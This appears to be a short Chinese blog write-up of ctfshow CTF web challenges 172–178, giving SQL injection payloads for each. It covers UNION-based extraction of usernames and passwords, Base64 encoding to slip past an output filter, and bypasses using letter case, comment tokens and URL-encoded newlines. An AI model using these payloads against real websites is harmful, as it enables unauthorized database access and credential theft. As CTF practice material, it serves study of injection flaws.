sql注入刷题

发布时间 2023-04-02 23:00:12作者: kode

web 172

 

 从题上可以看到查询语句为select username,password from ctfshow_user2可以知道是从ctfshow_user2表中获取username和password字段,但是它对于flag进行了过滤使得不能直接回显出flag,所以这里我们可以进行Base64编码。

payload:-1'union select to_base64(username),password from ctfshow_user2 --+    (注意这里只有俩个字段)

web 173

 

 同理不能有flag返回,所以我们继续用上面的payload也可以

payload:-1' union select id,to_base64(username),password from ctfshow_user3 --+  (注意这里是三个字段)

web 176

进行大小写绕过

payload:   -1' union Select 1,username,password from ctfshow_user --+

web 177

进行空格绕过

payload:   -1'/**/union/**/select/**/password,1,1/**/from/**/ctfshow_user/**/where/**/username/**/='flag'%23

web 178

这题对于/**/进行了过滤,我们可以用%0a绕过。

payload:-1'%0aunion%0aselect%0a1,group_concat(password),3%0afrom%0actfshow_user%23